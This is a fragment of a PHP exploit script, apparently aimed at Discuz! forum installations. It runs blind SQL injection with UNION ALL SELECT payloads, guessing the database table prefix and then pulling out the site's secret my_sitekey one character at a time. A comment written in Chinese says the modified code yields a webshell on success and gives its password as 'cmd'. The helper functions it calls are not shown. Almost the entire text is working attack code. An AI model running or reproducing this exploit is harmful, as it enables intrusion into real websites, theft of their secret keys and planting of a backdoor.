$tmp_expstr = "'"; $res = send(); if(strpos($res,'SQL syntax')==false){var_dump($res);die('Oooops.I can NOT hack it.');} preg_match('/FROM\s([a-zA-Z_]+)forum_order/',$res,$match); if($match[1])$pre = $match[1]; $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE ''='"; $res = send(); if(strpos($res,"doesn't exist")!==false){ echo "Table_pre is WRONG!\nReady to Crack It.Please Waiting..\n"; for($i = 1;$i<20;$i++){ $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND LENGTH(REPLACE(table_name,'forum_post_tableid',''))=$i AND ''='"; $res = send();
if(strpos($res,'SQL syntax')!==false){
$pre = ''; $hash2 = array(); $hash2 = array_merge($hash2, range(48, 57)); $hash2 = array_merge($hash2, range(97, 122)); $hash2[] = 95; for($j = 1;$j <= $i; $j++){ for ($k = 0; $k <= 255; $k++) { if(in_array($k, $hash2)) { $char = dechex($k); $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND MID(REPLACE(table_name,'forum_post_tableid',''),$j,1)=0x{$char} AND ''='"; $res = send(); if(strpos($res,'SQL syntax')!==false){ echo chr($k); $pre .= chr($k);break; } } } } if(strlen($pre)){echo "\nCracked...Table_Pre:".$pre."\n";break;}else{die('GET Table_pre Failed..');}; } } }; echo "Please Waiting....\n"; $sitekey = ''; for($i = 1;$i <= 32; $i++){ for ($k = 0; $k <= 255; $k++) { if(in_array($k, $hash)) { $char = dechex($k); $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE skey=0x6D795F736974656B6579 AND MID(svalue,{$i},1)=0x{$char} AND ''='"; $res = send(); if(strpos($res,'SQL syntax')!==false){ echo chr($k); $sitekey .= chr($k);break; }}}} /* By: alibaba 修改与添加了一些代码,如果成功就能得到shell 一句话秘密是 : cmd */ if(strlen($sitekey)!=32) { echo "\nmy_sitekey not found. try blank my_sitekey\n"; } else echo "\nmy_sitekey:{$sitekey}\n";